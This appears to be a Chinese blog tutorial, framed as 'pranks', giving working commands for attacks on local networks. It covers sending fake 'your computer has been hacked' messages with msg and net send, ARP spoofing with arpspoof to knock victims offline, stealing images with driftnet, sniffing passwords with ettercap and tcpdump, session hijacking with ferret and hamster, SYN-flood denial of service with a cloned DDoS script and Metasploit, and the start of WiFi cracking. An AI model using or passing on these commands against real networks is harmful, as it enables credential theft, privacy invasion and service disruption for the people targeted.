恶作剧
1.利用msg进行发送消息msg /server:192.168.123.141 * "你的电脑已经被入侵"#语法msg server:(ip) * "消息内容"注意事项①获取会话名称时的错误1722原因:RPC(一种调用模型)服务器不可用解决方法:win+r运行regedit.exe,找到"计算机\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contr
一,windows环境命令进行
一,发送信息类
1.利用msg进行发送消息
msg /server:192.168.123.141 * "你的电脑已经被入侵"
#语法
msg server:(ip) * "消息内容"
注意事项
①获取会话名称时的错误1722
原因:RPC(一种调用模型)服务器不可用
解决方法:
win+r运行regedit.exe,找到"计算机\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"把AllowRemoteRPC的值从0改为1就能接受信息了。
②获取会话名称时的错误5
造成原因:–>无用户凭据导致
解决方法:–>以管理员身份运行即可
③msg不是内部或外部命令
造成原因:–>无环境变量导致
解决方法:–>添加环境变量即可解决
2.老版本
利用net send 发送信息类
net send ip 信息
#如net send 192.168.123.94 sb
二.工具进行
arp攻击
1.检查以及获取网段
即查看局域网存活主机
fping -asg 192.168.1.1/24
或者-->nmap -sP ip
扫描常用的端口-->nmap -F -sT -v nmap.org
注意点:
①攻击者的IP和被攻击者的IP需要在同一个网段中(即需要两个ip段可以连接ping通)
②默认的网卡必须是eth0
–>如
2.攻击方法
echo 1 >/proc/sys/net/ipv4/ip_forward
#即开启端口转发功能
arpspoof -i eth0 -t 192.168.1.1 192.168.1.104
#即 前面的IP是靶机的IP,后面的IP是攻击者的ip 即将该ip欺骗到其他上面的状况特点-->断网攻击
#arpspoof -i 网卡 -t 网关 目标IP
driftnet -i eth0
#窃取受害者的图片
ettercap -Tq -i eth0
#ettercap -i 网卡 -Tq -M
#进行账号密码嗅探-->即抓取账号密码状况特点
tcpdump -i eth0 -w qq.cap
ferret -t qq.cap (64位下需要安装)
hamster
http://hamster
#session劫持
即arpspoo攻击成功后进行嗅探密码的状况特点
DOS/DDOS攻击
方法1
①安装ddos攻击模块
git clone https://github.com/Ha3MrX/DDos-Attack
②进入DDos-Attack且运行文件
cd DDos-Attack
ls
python ddos-attack.py
③输入目标的ip以及端口即可以进行攻击
方法2
利用Metasploit模块进行实现
#进入msf模块中
msfconsole
#进入潮汐攻击目录
use auxiliary/dos/tcp/synflood
set rhost 目标服务器
#执行
exploit
如 把自己的服务器拿来做测试做的一个小的攻击
窃取wifi密码
#扫描局域网范围中的wifi
airodump-ngwlan0mon
#
更多推荐
所有评论(0)